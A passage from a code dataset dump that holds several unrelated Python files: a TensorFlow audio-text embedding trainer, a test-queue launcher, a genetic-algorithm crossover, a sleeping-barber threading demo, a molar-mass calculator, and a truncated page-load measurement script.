norm2), axis=2)\n # shape should be (num, num)\n # _, indices = tf.nn.top_k(cos_sim, k=top_N)\n targets = tf.range(shape[0])\n top_Ks = tf.nn.in_top_k(cos_sim, targets, top_N)\n f_score = tf.reduce_mean(tf.cast(top_Ks, tf.float32))\n return f_score\n\n def getInputTensors(self):\n t2a_text_place = self.graph.get_tensor_by_name(\n 't2a_'+self.TEXT_HOLDER+':0')\n t2a_audio_place = self.graph.get_tensor_by_name(\n 't2a_'+self.AUDIO_HOLDER + ':0')\n a2t_text_place = self.graph.get_tensor_by_name(\n 'a2t_'+self.TEXT_HOLDER+':0')\n a2t_audio_place = self.graph.get_tensor_by_name(\n 'a2t_'+self.AUDIO_HOLDER+':0')\n return t2a_text_place, t2a_audio_place, a2t_audio_place, a2t_text_place\n\n def getFscoreOps(self):\n return self.f1score, self.f10score\n\n def trainOracle(\n self,\n lr = 0.1,\n epoch = 1000,\n decay_factor = 0.95,\n ):\n t2a_text_place, t2a_audio_place, a2t_audio_place, a2t_text_place = self.getInputTensors()\n lr_place = self.graph.get_tensor_by_name(self.LR_HOLDER + ':0')\n\n t2a_loss_tensor = self.graph.get_tensor_by_name(\n 't2a_loss:0')\n a2t_loss_tensor = self.graph.get_tensor_by_name(\n 'a2t_loss:0')\n t2a2t_loss_tensor = self.graph.get_tensor_by_name(\n 't2a2t_loss:0')\n a2t2a_loss_tensor = self.graph.get_tensor_by_name(\n 'a2t2a_loss:0')\n all_loss = self.graph.get_tensor_by_name(\n 'all_loss:0')\n train_op = self.graph.get_operation_by_name('train_op')\n batch_iter = self.gen_batch()\n loss = 0.\n self.new_epoch = False\n for epoch_num in range(epoch):\n while not self.new_epoch:\n t2a_text, t2a_audio, a2t_audio, a2t_text = next(batch_iter)\n _, loss, t2a_loss, a2t_loss, t2a2t_loss, a2t2a_loss = self.sess.run(# noqa\n [\n train_op,\n all_loss,\n t2a_loss_tensor,\n a2t_loss_tensor,\n t2a2t_loss_tensor,\n a2t2a_loss_tensor,\n ],\n feed_dict={\n t2a_text_place: t2a_text,\n t2a_audio_place: t2a_audio,\n a2t_audio_place: a2t_audio,\n a2t_text_place: a2t_text,\n lr_place: lr,\n })\n self.new_epoch = False\n self.logger.info('Epoch {}, loss:{}'.format(\n epoch_num,\n loss,\n ))\n loss_str = 'Epoch {}, loss: {}, t2a:{}, a2t:{}, t2a2t:{}, a2t2a:{} lr:{}'\n # print(loss_str.format(epoch_num, loss, t2a_loss, a2t_loss, t2a2t_loss,\n # a2t2a_loss, lr))\n if (epoch_num+1) % 100 == 0:\n lr *= decay_factor\n if (epoch_num+1) % 1000 == 0:\n f1_score, f10_score = self.calcFscore(self.text_embeds, self.audio_embeds)\n print('F1 Score:{}, F10 Score:{}'.format(f1_score, f10_score))\n return (loss, t2a_loss, a2t_loss, t2a2t_loss, a2t2a_loss)\n\n def trainUnsupersiced(\n self,\n lr = 0.1,\n epoch = 1000,\n decay_factor = 0.95,\n ):\n t2a_text_place, t2a_audio_place, a2t_audio_place, a2t_text_place = self.getInputTensors()\n lr_place = self.graph.get_tensor_by_name(self.LR_HOLDER + ':0')\n\n t2a_loss_tensor = self.graph.get_tensor_by_name(\n 't2a_loss:0')\n a2t_loss_tensor = self.graph.get_tensor_by_name(\n 'a2t_loss:0')\n t2a2t_loss_tensor = self.graph.get_tensor_by_name(\n 't2a2t_loss:0')\n a2t2a_loss_tensor = self.graph.get_tensor_by_name(\n 'a2t2a_loss:0')\n all_loss = self.graph.get_tensor_by_name(\n 'all_loss:0')\n train_op = self.graph.get_operation_by_name('train_op')\n batch_iter = self.gen_batch()\n loss = 0.\n self.new_epoch = False\n for epoch_num in range(epoch):\n while not self.new_epoch:\n t2a_text, t2a_audio, a2t_audio, a2t_text = next(batch_iter)\n _, loss, t2a_loss, a2t_loss, t2a2t_loss, a2t2a_loss = self.sess.run(# noqa\n [\n train_op,\n all_loss,\n t2a_loss_tensor,\n a2t_loss_tensor,\n t2a2t_loss_tensor,\n a2t2a_loss_tensor,\n ],\n feed_dict={\n t2a_text_place: t2a_text,\n t2a_audio_place: t2a_audio,\n a2t_audio_place: a2t_audio,\n a2t_text_place: a2t_text,\n lr_place: lr,\n })\n self.new_epoch = False\n self.logger.info('Epoch {}, loss:{}'.format(\n epoch_num,\n loss,\n ))\n loss_str = 'Epoch {}, loss: {}, t2a:{}, a2t:{}, t2a2t:{}, a2t2a:{} lr:{}'\n # print(loss_str.format(epoch_num, loss, t2a_loss, a2t_loss, t2a2t_loss,\n # a2t2a_loss, lr))\n if (epoch_num+1) % 100 == 0:\n lr *= decay_factor\n if (epoch_num+1) % 1000 == 0:\n f1_score, f10_score = self.calcFscore(self.text_embeds, self.audio_embeds)\n print('F1 Score:{}, F10 Score:{}'.format(f1_score, f10_score))\n return (loss, t2a_loss, a2t_loss, t2a2t_loss, a2t2a_loss)\n def calcFscore(self, text_emb, audio_emb):\n f1_op, f10_op = self.getFscoreOps()\n t2a_text, t2a_audio, a2t_audio, a2t_text = self.getInputTensors()\n f1_score, f10_score = self.sess.run(\n [f1_op, f10_op],\n feed_dict={\n t2a_text: text_emb,\n t2a_audio: audio_emb,\n a2t_audio: audio_emb,\n a2t_text: text_emb,\n }\n )\n return f1_score, f10_score\n\n def get_matrix(self):\n a2t = self.graph.get_tensor_by_name(\n 'a2t_matrix:0')\n t2a = self.graph.get_tensor_by_name(\n 't2a_matrix:0')\n a2t_matrix = self.sess.run([a2t])\n t2a_matrix = self.sess.run([t2a])\n return a2t_matrix, t2a_matrix\n\n def save(self, path: str):\n hyper_path, var_path = self.gen_hyper_model_path(path)\n with open(hyper_path, 'wb') as hpb:\n params = {\n 'audio_dim': self.audio_dim,\n 'text_dim': self.text_dim,\n 'batch_size': self.batch_size,\n 'penalty_lambda': self.penalty_lambda,\n }\n pkl.dump(params, hpb)\n self.saver.save(self.sess, path)\n\n @classmethod\n def load(cls, path: str):\n hyper_path, var_path = cls.gen_hyper_model_path(path)\n with open(hyper_path, 'rb') as f:\n params = pkl.load(f)\n mdl = cls(**params)\n mdl.saver.restore(mdl.sess, var_path)\n return mdl\n","repo_name":"grtzsohalf/Audio-Phonetic-and-Semantic-Embedding","sub_path":"parallelizing/audio2text_ICP.py","file_name":"audio2text_ICP.py","file_ext":"py","file_size_in_byte":16038,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"22769474310","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport commands\nfrom argparse import ArgumentParser\n\ndef main():\n global eid\n eid = commands.getoutput('whoami')\n\n scope = ['all', 'py', 'ttcn']\n action = {'all' : start_all, 'py': start_py, 'ttcn': start_ttcn}\n\n parser = ArgumentParser()\n parser.add_argument('buildid', type = str, help = 'build binary')\n parser.add_argument('--testid', type = str, help = 'test binary, default = buildid', default = '', dest = 'testid')\n parser.add_argument('--scope', type = str, help = 'test scope, default = all', default = 'all', dest = 'scope', choices = scope)\n\n args = parser.parse_args()\n buildid = args.buildid\n testid = args.testid\n scope = args.scope\n\n if testid == '':\n testid = buildid\n\n action[scope](buildid, testid)\n\n\ndef start_all(buildid, testid):\n start_py(buildid, testid)\n start_ttcn(buildid, testid)\n\ndef start_py(buildid, testid):\n global eid\n cmds=[\n'''\nqueue_run.py --ett-specification standard --replace 1 --node-type EVRTD --suites-order LongestSuiteFirst \\\n--build-id %BUILDID% --test-type TTCN --days-to-wait 6 --label TTCN-SMF_BASIC-EVRTD_standard \\\n--priority normal+ --split-count 1 --username %EID% --test-scope SMF_BASIC --test-binary-id %TESTID% --official --max-rerun-ratio 0.1\n'''\n,\n'''\nqueue_run.py --ett-specification standard --replace 1 --node-type EVRTD --suites-order LongestSuiteFirst \\\n--build_id %BUILDID% --test-type TTCN --days-to-wait 6 --label TTCN-SMF_EXTENDED-EVRTD_standard \\\n--priority normal+ --split-count 3 --username %EID% --test-scope SMF_EXTENDED --test-binary-id %TESTID% --official --max-rerun-ratio 0.1 \n'''\n ]\n for cmd in cmds:\n cmd = cmd.replace('%BUILDID%', buildid).replace('%TESTID%', testid).replace('%EID%', eid)\n os.system(cmd)\n\ndef start_ttcn(buildid, testid):\n cmds=[\n'''\nqueue_run.py --ett-specification cups_small --replace 1 --node-type EVRTD --suites-order LongestSuiteFirst \\\n--build-id %BUILDID% --test-type TTCN --days-to-wait 6 --label TTCN-SMF_CUPS_INT-EVRTD_cups_small \\\n--priority high+ --custom-arguments '--filter-tags \\!PYTHON&&SMF_CUPS_INT' --split-count 1 --username %EID% --test-scope SMF_CUPS_INT \\\n--test-binary-id %TESTID% --official --max-rerun-ratio 0.1\n'''\n,\n'''\nqueue_run.py --ett-specification standard --node-type EVRTD --suites-order LongestSuiteFirst \\\n--build-id %BUILDID% --test-type TTCN --days-to-wait 6 --label TTCN-SMF_SA-EVRTD_standard \\\n--priority high+ --split-count 1 --username %EID% --test-scope SMF_SA --test-binary-id %TESTID% --official --max-rerun-ratio 0.1\n'''\n,\n'''\nqueue_run.py --ett-specification pccsm_ft --replace 1 --node-type CEPG --suites-order LongestSuiteFirst \\\n--build-id %BUILDID% --test-type TTCN --days-to-wait 6 --label TTCN-SMF_SA-CEPG_pccsm_ft --priority high \\\n--custom-arguments ' --filter-tags SMF_SA&&\\!NOT_READY_PCC --extra-timeout 240' --split-count 1 --username %EID% --test-scope SMF_SA \\\n--test-binary-id %TESTID% --official --max-rerun-ratio 0.1\n'''\n ]\n for cmd in cmds:\n cmd = cmd.replace('%BUILDID%', buildid).replace('%TESTID%', testid).replace('%EID%', eid)\n os.system(cmd)\n\nmain()","repo_name":"iceinveins/utilpy","sub_path":"professional.py","file_name":"professional.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73286977795","text":"import numpy as np\n\n\ndef recombinacao_ox(cromossomo_p1, cromossomo_p2):\n \"\"\"\n Realiza a recombinação OX1 sobre dois cromossomos\n :param np.ndarray cromossomo_p1: cromossomo do pai 1\n :param np.ndarray cromossomo_p2: cromossomo do pai 2\n :return: dois descendentes\n \"\"\"\n n_alelo = len(cromossomo_p1)\n pais = [cromossomo_p1, cromossomo_p2]\n descendentes = []\n for indice_pai in range(0, 2):\n cromossomo_descendente = np.full(shape=n_alelo, fill_value=-1)\n pos_corte_1 = np.random.randint(low=0, high=n_alelo-1)\n pos_corte_2 = np.random.randint(low=pos_corte_1+1, high=n_alelo)\n secao_cromossomo = pais[indice_pai][pos_corte_1:pos_corte_2]\n cromossomo_descendente[pos_corte_1:pos_corte_2] = secao_cromossomo\n locus = 0\n locus_pai = 0\n while locus < n_alelo:\n if (locus < pos_corte_1) or (locus >= pos_corte_2):\n while pais[indice_pai-1][locus_pai] in cromossomo_descendente:\n locus_pai += 1\n cromossomo_descendente[locus] = pais[indice_pai-1][locus_pai]\n locus += 1\n locus_pai += 1\n else:\n locus += 1\n descendentes.append([cromossomo_descendente, 0, 0])\n return descendentes\n","repo_name":"joaoppagnan/ia707-efc1","sub_path":"scripts/algoritmo_genetico/recombinacao_ox.py","file_name":"recombinacao_ox.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40482726255","text":"import random\nimport threading\nimport time\n'''\n The Sleeping-Barber Problem\n A barbershopconsists of a waiting room with n chairs and the barber room\n containing thebarber chair. If there are no customers to be served, the\n barber goes to sleep.If a customer enters the barbershop and all chairs are\n occupied, then thecustomer leaves the shop. If the barber is busy but\n chairs are available, thenthe customer sits in one of the free chairs. If\n the barber is asleep, thecustomer wakes up the barber. Write a program to\n coordinate the barber and the customers.\n 🛌代表空座\t😴代表等待\t😁代表此时此刻轮到自己\t🕺代表理发完成离开\t🏌️‍代表无空座离开\n ┐\n |代表理发师的一个工作周期\n ┘\n 本示例默认新来的顾客会在上一个等待的人的右边坐下,若上一个等待的人坐在最后一个座位,\n 则考虑第一个座位;若没有等待的人,则坐在第一个座位\n'''\n\nchairs = 5\nnext_chair = 1 # 下一个(即将到来)顾客的座位\ncustomers = threading.Semaphore(0)\nbarbers = threading.Semaphore(0)\nmutex = threading.Semaphore(1) # 锁waiting\nwaiting = 0\nscene = ['🛌' for i in range(chairs)] + ['']\n\n\ndef barber():\n global waiting, next_chair, scene\n cus = 0\n while (True):\n customers.acquire()\n mutex.acquire()\n\n # 输出\n current_customer = ((next_chair + 5) - waiting - 1) % 5\n scene[current_customer] = '😁'\n # #\n\n waiting -= 1\n\n # 输出\n if waiting == 0:\n next_chair = 1\n print(f' Barber cut customer {cus + 1:<5}\\t', *scene[:-1], ' ┐')\n scene[-1] = ' |'\n scene[current_customer] = '🛌'\n # #\n\n barbers.release()\n mutex.release()\n\n # 开始剪头发\n time.sleep(1 + random.random())\n scene[-1] = ''\n print(f' Barber end customer {cus + 1:<5}\\t', *scene[:-1], ' ┘',\n '🕺')\n cus += 1\n # #\n\n\ndef customer(cus):\n global waiting, next_chair, scene\n mutex.acquire()\n print(f'Customer {cus + 1:^3}', end=' ')\n if waiting < chairs:\n scene[next_chair - 1] = '😴'\n print(f'sits chair {next_chair}\\t', *scene)\n waiting += 1\n next_chair = next_chair % 5 + 1\n customers.release()\n mutex.release()\n barbers.acquire()\n # get_haircut\n else:\n print(f'{\"leave\":^10}\\t\\t', *scene, '🏌️‍')\n mutex.release()\n\n\nif __name__ == \"__main__\":\n cus = 0 # 顾客编号\n threading.Thread(target=barber).start()\n while True:\n threading.Thread(target=customer, args=(cus, )).start()\n time.sleep(0.5 + random.random())\n cus += 1\n","repo_name":"cnarutox/Python-Labs","sub_path":"Classical IPC Problems/sleepingBarber.py","file_name":"sleepingBarber.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33606314159","text":"from random import sample\nfrom statistics import quantiles\n\n\ndef main():\n\n answer = int(\n input(\n 'Welcome to the molar mass calculator!\\nYou give me a molecule and tell me how much of it you have, and I\\'ll tell you the molar mass of the molecule and how many moles you have. Let\\'s get started!\\nHow do you want to search for your particular molecule? \\nType \"1\" to search by chemical formula, and type \"2\" to search by molecule name. Type \"0\" to quit.\\nSo, what\\'ll it be? '\n ))\n while answer != 0:\n if answer == 1:\n formula = input(\n 'What is the chemical formula of the molecule in question? ')\n has_name, molecule_name = get_molecule_name(formula)\n if has_name:\n print(\n f'Success! Looks like I have that molecule on file. The name of your molecule is: {molecule_name}. '\n )\n else:\n print(\n f'Sorry, looks like I don\\'t know the name of \"{formula}\" yet. I can still calculate the values you need though! '\n )\n molecule_name = formula\n answer = 0\n else:\n molecule_name = input(\n 'What is the name of the molecule in question? ')\n has_formula, formula = get_molecule_formula(molecule_name)\n if has_formula:\n print(\n f'Success! Looks like I have {molecule_name} on file. The chemical formula for that one is: {formula}. '\n )\n answer = 0\n else:\n print(\n f'Sorry, looks like I don\\'t know the formula for {molecule_name} yet. Do you want to input by chemical formula? \\n'\n )\n answer = 1\n calculate(molecule_name, formula)\n\n\ndef calculate(substance, formula):\n periodic_table_dict = make_periodic_table()\n sample_mass = float(input(f'How many grams of {substance} do you have? '))\n symbol_quantity_list = parse_formula(formula, periodic_table_dict)\n molar_mass = compute_molar_mass(symbol_quantity_list, periodic_table_dict)\n moles_in_sample = sample_mass / molar_mass\n print(\n f'\\nThe molar mass of {substance} is {molar_mass:.5f}.\\nYou have {moles_in_sample:5f} moles in your sample. '\n )\n\n\ndef make_periodic_table():\n periodic_table_dict = {\n # [symbol, name, atomic_mass]\n \"Ac\": [\"Actinium\", 227],\n \"Ag\": [\"Silver\", 107.8682],\n \"Al\": [\"Aluminum\", 26.9815386],\n \"Ar\": [\"Argon\", 39.948],\n \"As\": [\"Arsenic\", 74.9216],\n \"At\": [\"Astatine\", 210],\n \"Au\": [\"Gold\", 196.966569],\n \"B\": [\"Boron\", 10.811],\n \"Ba\": [\"Barium\", 137.327],\n \"Be\": [\"Beryllium\", 9.012182],\n \"Bi\": [\"Bismuth\", 208.9804],\n \"Br\": [\"Bromine\", 79.904],\n \"C\": [\"Carbon\", 12.0107],\n \"Ca\": [\"Calcium\", 40.078],\n \"Cd\": [\"Cadmium\", 112.411],\n \"Ce\": [\"Cerium\", 140.116],\n \"Cl\": [\"Chlorine\", 35.453],\n \"Co\": [\"Cobalt\", 58.933195],\n \"Cr\": [\"Chromium\", 51.9961],\n \"Cs\": [\"Cesium\", 132.9054519],\n \"Cu\": [\"Copper\", 63.546],\n \"Dy\": [\"Dysprosium\", 162.5],\n \"Er\": [\"Erbium\", 167.259],\n \"Eu\": [\"Europium\", 151.964],\n \"F\": [\"Fluorine\", 18.9984032],\n \"Fe\": [\"Iron\", 55.845],\n \"Fr\": [\"Francium\", 223],\n \"Ga\": [\"Gallium\", 69.723],\n \"Gd\": [\"Gadolinium\", 157.25],\n \"Ge\": [\"Germanium\", 72.64],\n \"H\": [\"Hydrogen\", 1.00794],\n \"He\": [\"Helium\", 4.002602],\n \"Hf\": [\"Hafnium\", 178.49],\n \"Hg\": [\"Mercury\", 200.59],\n \"Ho\": [\"Holmium\", 164.93032],\n \"I\": [\"Iodine\", 126.90447],\n \"In\": [\"Indium\", 114.818],\n \"Ir\": [\"Iridium\", 192.217],\n \"K\": [\"Potassium\", 39.0983],\n \"Kr\": [\"Krypton\", 83.798],\n \"La\": [\"Lanthanum\", 138.90547],\n \"Li\": [\"Lithium\", 6.941],\n \"Lu\": [\"Lutetium\", 174.9668],\n \"Mg\": [\"Magnesium\", 24.305],\n \"Mn\": [\"Manganese\", 54.938045],\n \"Mo\": [\"Molybdenum\", 95.96],\n \"N\": [\"Nitrogen\", 14.0067],\n \"Na\": [\"Sodium\", 22.98976928],\n \"Nb\": [\"Niobium\", 92.90638],\n \"Nd\": [\"Neodymium\", 144.242],\n \"Ne\": [\"Neon\", 20.1797],\n \"Ni\": [\"Nickel\", 58.6934],\n \"Np\": [\"Neptunium\", 237],\n \"O\": [\"Oxygen\", 15.9994],\n \"Os\": [\"Osmium\", 190.23],\n \"P\": [\"Phosphorus\", 30.973762],\n \"Pa\": [\"Protactinium\", 231.03588],\n \"Pb\": [\"Lead\", 207.2],\n \"Pd\": [\"Palladium\", 106.42],\n \"Pm\": [\"Promethium\", 145],\n \"Po\": [\"Polonium\", 209],\n \"Pr\": [\"Praseodymium\", 140.90765],\n \"Pt\": [\"Platinum\", 195.084],\n \"Pu\": [\"Plutonium\", 244],\n \"Ra\": [\"Radium\", 226],\n \"Rb\": [\"Rubidium\", 85.4678],\n \"Re\": [\"Rhenium\", 186.207],\n \"Rh\": [\"Rhodium\", 102.9055],\n \"Rn\": [\"Radon\", 222],\n \"Ru\": [\"Ruthenium\", 101.07],\n \"S\": [\"Sulfur\", 32.065],\n \"Sb\": [\"Antimony\", 121.76],\n \"Sc\": [\"Scandium\", 44.955912],\n \"Se\": [\"Selenium\", 78.96],\n \"Si\": [\"Silicon\", 28.0855],\n \"Sm\": [\"Samarium\", 150.36],\n \"Sn\": [\"Tin\", 118.71],\n \"Sr\": [\"Strontium\", 87.62],\n \"Ta\": [\"Tantalum\", 180.94788],\n \"Tb\": [\"Terbium\", 158.92535],\n \"Tc\": [\"Technetium\", 98],\n \"Te\": [\"Tellurium\", 127.6],\n \"Th\": [\"Thorium\", 232.03806],\n \"Ti\": [\"Titanium\", 47.867],\n \"Tl\": [\"Thallium\", 204.3833],\n \"Tm\": [\"Thulium\", 168.93421],\n \"U\": [\"Uranium\", 238.02891],\n \"V\": [\"Vanadium\", 50.9415],\n \"W\": [\"Tungsten\", 183.84],\n \"Xe\": [\"Xenon\", 131.293],\n \"Y\": [\"Yttrium\", 88.90585],\n \"Yb\": [\"Ytterbium\", 173.054],\n \"Zn\": [\"Zinc\", 65.38],\n \"Zr\": [\"Zirconium\", 91.224]\n }\n return periodic_table_dict\n\n\nclass FormulaError(ValueError):\n \"\"\"FormulaError is the type of error that\n parse_formula will raise if a formula is invalid.\n \"\"\"\n\n\ndef parse_formula(formula, periodic_table_dict):\n \"\"\"Convert a chemical formula for a molecule into a compound list\n that stores the quantity of atoms of each element in the molecule.\n For example, this function will convert \"H2O\" to [[\"H\", 2], [\"O\", 1]]\n and \"PO4H2(CH2)12CH3\" to [[\"P\", 1], [\"O\", 4], [\"H\", 29], [\"C\", 13]]\n\n Parameters\n formula: a string that contains a chemical formula\n periodic_table_dict: the compound dictionary returned\n from make_periodic_table\n Return: a compound list that contains chemical symbols and\n quantities like this [[\"Fe\", 2], [\"O\", 3]]\n \"\"\"\n assert isinstance(formula, str), \\\n \"wrong data type for parameter formula; \" \\\n f\"formula is a {type(formula)} but must be a string\"\n assert isinstance(periodic_table_dict, dict), \\\n \"wrong data type for parameter periodic_table_dict; \" \\\n f\"periodic_table_dict is a {type(periodic_table_dict)} \" \\\n \"but must be a dictionary\"\n\n def parse_quant(formula, index):\n quant = 1\n if index < len(formula) and formula[index].isdecimal():\n start = index\n index += 1\n while index < len(formula) and formula[index].isdecimal():\n index += 1\n quant = int(formula[start:index])\n return quant, index\n\n def get_quant(elems, symbol):\n return 0 if symbol not in elems else elems[symbol]\n\n def parse_r(formula, index, level):\n start_index = index\n start_level = level\n elem_dict = {}\n while index < len(formula):\n ch = formula[index]\n if ch == \"(\":\n group_dict, index = parse_r(formula, index + 1, level + 1)\n quant, index = parse_quant(formula, index)\n for symbol in group_dict:\n prev = get_quant(elem_dict, symbol)\n elem_dict[symbol] = prev + group_dict[symbol] * quant\n elif ch.isalpha():\n symbol = formula[index:index + 2]\n if symbol in periodic_table_dict:\n index += 2\n else:\n symbol = formula[index:index + 1]\n if symbol in periodic_table_dict:\n index += 1\n else:\n raise FormulaError(\n \"invalid formula, unknown element symbol:\",\n formula, index)\n quant, index = parse_quant(formula, index)\n prev = get_quant(elem_dict, symbol)\n elem_dict[symbol] = prev + quant\n elif ch == \")\":\n if level == 0:\n raise FormulaError(\n \"invalid formula, unmatched close parenthesis:\",\n formula, index)\n level -= 1\n index += 1\n break\n else:\n if ch.isdecimal():\n # Decimal digit not preceded by an\n # element symbol or close parenthesis\n message = \"invalid formula:\"\n else:\n # Illegal character: [^()0-9a-zA-Z]\n message = \"invalid formula, illegal character:\"\n raise FormulaError(message, formula, index)\n if level > 0 and level >= start_level:\n raise FormulaError(\"invalid formula, unmatched open parenthesis:\",\n formula, start_index - 1)\n return elem_dict, index\n\n # Return the compound list of element symbols and\n # quantities. Each element in the compound list\n # will be a list in this form: [\"symbol\", quantity]\n elem_dict, _ = parse_r(formula, 0, 0)\n return list(elem_dict.items())\n\n\n# Indexes for inner lists in the periodic table\nNAME_INDEX = 0\nATOMIC_MASS_INDEX = 1\n\n# Indexes for inner lists in a symbol_quantity_list\nSYMBOL_INDEX = 0\nQUANTITY_INDEX = 1\n\n\ndef compute_molar_mass(symbol_quantity_list, periodic_table_dict):\n \"\"\"Compute and return the total molar mass of all the\n elements listed in symbol_quantity_list.\n\n Parameters\n symbol_quantity_list is a compound list. Each small\n list in symbol_quantity_list has this form:\n [\"symbol\", quantity].\n periodic_table_dict is the compound dictionary returned\n from make_periodic_table.\n Return: the total molar mass of all the elements in\n symbol_quantity_list.\n\n For example, if symbol_quantity_list is [[\"H\", 2], [\"O\", 1]],\n this function will calculate and return\n atomic_mass(\"H\") * 2 + atomic_mass(\"O\") * 1\n 1.00794 * 2 + 15.9994 * 1\n 18.01528\n \"\"\"\n total_mass = 0\n # For each list in the compound symbol_quantity_list:\n for list in symbol_quantity_list:\n # Separate the list into symbol and quantity.\n symbol = list[SYMBOL_INDEX]\n quantity = list[QUANTITY_INDEX]\n # Get the atomic mass for the symbol from the dictionary.\n atomic_mass = periodic_table_dict[symbol][ATOMIC_MASS_INDEX]\n # Multiply the atomic mass by the quantity.\n product = atomic_mass * quantity\n # Add the product into the total mass.\n total_mass = total_mass + product\n # Return the total mass.\n return total_mass\n\n\ndef make_molecules_dict():\n known_molecules_dict = [{\n 'formula': \"Al2O3\",\n 'name': \"aluminum oxide\"\n }, {\n 'formula': \"CH3OH\",\n 'name': \"methanol\"\n }, {\n 'formula': \"C2H6O\",\n 'name': \"ethanol\"\n }, {\n 'formula': \"C2H5OH\",\n 'name': \"ethanol\"\n }, {\n 'formula': \"C3H8O\",\n 'name': \"isopropyl alcohol\"\n }, {\n 'formula': \"C3H8\",\n 'name': \"propane\"\n }, {\n 'formula': \"C4H10\",\n 'name': \"butane\"\n }, {\n 'formula': \"C6H6\",\n 'name': \"benzene\"\n }, {\n 'formula': \"C6H14\",\n 'name': \"hexane\"\n }, {\n 'formula': \"C8H18\",\n 'name': \"octane\"\n }, {\n 'formula': \"CH3(CH2)6CH3\",\n 'name': \"octane\"\n }, {\n 'formula': \"C13H18O2\",\n 'name': \"ibuprofen\"\n }, {\n 'formula': \"C13H16N2O2\",\n 'name': \"melatonin\"\n }, {\n 'formula': \"Fe2O3\",\n 'name': \"iron oxide\"\n }, {\n 'formula': \"FeS2\",\n 'name': \"iron pyrite\"\n }, {\n 'formula': \"H2O\",\n 'name': \"water\"\n }]\n return known_molecules_dict\n\n\ndef get_molecule_name(formula):\n molecules_dict = make_molecules_dict()\n for molecule in molecules_dict:\n if formula == molecule['formula']:\n return True, molecule[\"name\"]\n else:\n return False, False\n\n\ndef get_molecule_formula(molecule_name):\n molecules_dict = make_molecules_dict()\n for molecule in molecules_dict:\n if molecule['name'] == molecule_name:\n return True, molecule['formula']\n return False, False\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"glenmeredith68/cse111","sub_path":"w08/chemistry.py","file_name":"chemistry.py","file_ext":"py","file_size_in_byte":12971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34829007998","text":"#!/usr/bin/env python3\n\nimport os\nfrom pathlib import Path\nimport pwd\nimport tempfile\nimport time\nimport shutil\nfrom signal import SIGINT\nimport subprocess\nfrom subprocess import PIPE\nimport sys\n\n\nMAHIMAHI_RECORD_DIR = \"record\"\nWPR_RECORD_FILE = \"record.wpr\"\nDELAY = 100\nTRACE = \"5Mbps_trace\"\nBW = \"5Mbit/s\"\nMEASURE_DIR = \"measurements-%d-%s\" % (DELAY, TRACE)\nRUNS = 2\nTIMEOUT = 120 # seconds\nRETRIES = 3\n\nSHELLS = [\"mm-delay\", str(DELAY), \"mm-link\", TRACE, TRACE, \"--\"]\n\n\ndef run(args, cwd=None):\n try: # Try to clean up.\n subprocess.run([\"killall\", \"chromedriver\"], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, timeout=2)\n subprocess.run([\"killall\", \"chrome\"], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, timeout=2)\n except Exception:\n pass\n\n proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n preexec_fn=demote, cwd=cwd)\n try:\n outs, errs = proc.communicate(timeout=TIMEOUT)\n if proc.returncode != 0:\n raise Exception(errs)\n\n return outs\n except subprocess.TimeoutExpired:\n proc.terminate()\n raise\n\n\ndef atomic_write(content, filename):\n # https://stackoverflow.com/questions/2333872/atomic-writing-to-file-with-python\n tf = tempfile.NamedTemporaryFile(mode='w', delete=False)\n tf.write(content)\n tf.flush()\n os.fsync(tf.fileno())\n tf.close()\n os.rename(tf.name, filename)\n\n\ndef record_wpr(website):\n wpr_record_file = Path(WPR_RECORD_FILE)\n if wpr_record_file.exists():\n wpr_record_file.unlink()\n\n wpr_command = [\"./replay.py\", \"-l\", \"critical\", \"--no-dns_forwarding\", \"--record\",\n os.path.join(os.getcwd(), WPR_RECORD_FILE)]\n proc = subprocess.Popen(wpr_command, cwd=\"web-page-replay\")\n try:\n time.sleep(2)\n run([\"./chrome-fetch-host-resolver.py\", website])\n time.sleep(2)\n finally:\n proc.send_signal(SIGINT)\n proc.wait(timeout=2)\n\n if proc.returncode != 0:\n raise Exception(errs)\n\n\ndef measure_wpr(website):\n wpr_record_file = Path(WPR_RECORD_FILE)\n if not wpr_record_file.exists():\n raise FileNotFoundError(WPR_RECORD_FILE)\n\n wpr_command = [\"./replay.py\", \"-l\", \"critical\", \"--up\", BW, \"--down\", BW,\n \"--delay_ms=%d\" % (2*DELAY), os.path.join(os.getcwd(), WPR_RECORD_FILE)]\n proc = subprocess.Popen(wpr_command, cwd=\"web-page-replay\")\n try:\n time.sleep(2)\n measure = int(run([\"./measure.py\", website]))\n time.sleep(1)\n finally:\n proc.send_signal(SIGINT)\n proc.wait(timeout=2)\n\n if proc.returncode != 0:\n raise Exception(errs)\n\n return measure\n\n\ndef dot():\n sys.stderr.write(\".\")\n sys.stderr.flush()\n\n\ndef measure(website, result_path):\n print(\"Measuring %s\" % website, file=sys.stderr)\n\n for i in range(RUNS):\n sys.stderr.write(\"\\tRun %d \" % i)\n sys.stderr.flush()\n result_file = result_path / ('%s-%d' % (website, i))\n if result_file.exists():\n print(\"EXISTS\", file=sys.stderr)\n continue\n\n success = False\n for _ in range(RETRIES):\n try:\n start_time = time.perf_counter()\n\n # Raw measurement (network simulation by WPR TrafficShaper)\n wpr_raw_measure = int(run([\"./shaped-measure.py\", website,\n str(DELAY*2), BW], cwd=\"web-page-replay\"))\n dot()\n\n # Web-page-replay record\n record_wpr(website)\n dot()\n\n # Web-page-replay measure\n wpr_measure = measure_wpr(website)\n dot()\n\n # Raw measurement (network simulation by Mahimahi)\n mahimahi_raw_measure = int(run(SHELLS + [\"./measure.py\", website]))\n dot()\n\n # Mahimahi record\n if Path(MAHIMAHI_RECORD_DIR).exists():\n shutil.rmtree(MAHIMAHI_RECORD_DIR)\n run([\"mm-webrecord\", MAHIMAHI_RECORD_DIR, 